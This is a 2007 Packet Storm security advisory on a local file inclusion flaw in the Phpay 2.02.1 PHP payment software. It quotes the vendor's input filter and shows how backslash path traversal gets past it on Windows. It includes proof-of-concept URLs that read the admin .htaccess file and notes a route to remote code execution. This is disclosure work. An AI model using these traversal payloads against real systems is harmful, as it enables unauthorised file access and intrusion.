phpay-lfi.txt

2007-12-18T00:00:00
ID PACKETSTORM:61866
Type packetstorm
Reporter Michael Brooks
Modified 2007-12-18T00:00:00

Description

                                        
                                            `By Michael Brooks  
  
Vulnerability Type:Local File Inclusion  
  
Software: Phpay  
  
Homepage:http://sourceforge.net/projects/phpay/  
  
Version Affected:2.02.1  
  
  
  
Phpay has been affected by multiple local file include flaws, as a result this patch was written:  
  
$config = ereg_replace(":","", $config);  
  
$config = trim(ereg_replace("../","", $config));  
  
$config = trim(ereg_replace("/","", $config));  
  
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}  
  
if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}  
  
require("./$config");  
  
  
  
To bypass this patch backslashes can be used instead of forward slashes on windows systems.   
  
Also .inc.php must exists *somewhere* in the string.  
  
Local File Include for windows only:  
  
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess  
  
or if magic_quotes_gpc is turned on:  
  
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess  
  
  
  
Remote code execution is accessible in the ./admin/ folder.   
  
The admin folder *should* be protected by a .htaccess file similar to osCommerce2.   
  
  
  
Vulnerable configuration:  
  
A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue.   
  
  
  
  
  
Merry Christmas  
`